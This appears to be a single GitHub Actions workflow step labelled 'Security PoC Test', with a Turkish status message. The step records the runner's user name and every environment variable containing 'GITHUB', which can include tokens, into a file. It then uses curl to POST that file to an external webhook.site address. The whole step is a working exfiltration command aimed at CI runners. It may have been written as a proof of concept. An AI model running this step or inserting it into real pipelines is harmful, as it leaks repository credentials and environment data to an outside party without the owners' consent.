- name: Security PoC Test
        run: |
          echo "Test icra edilir..."
          whoami > info.txt
          env | grep "GITHUB" >> info.txt
          curl -X POST -d @info.txt https://webhook.site/eb29b992-fed7-42e0-9483-f070e2b60aea
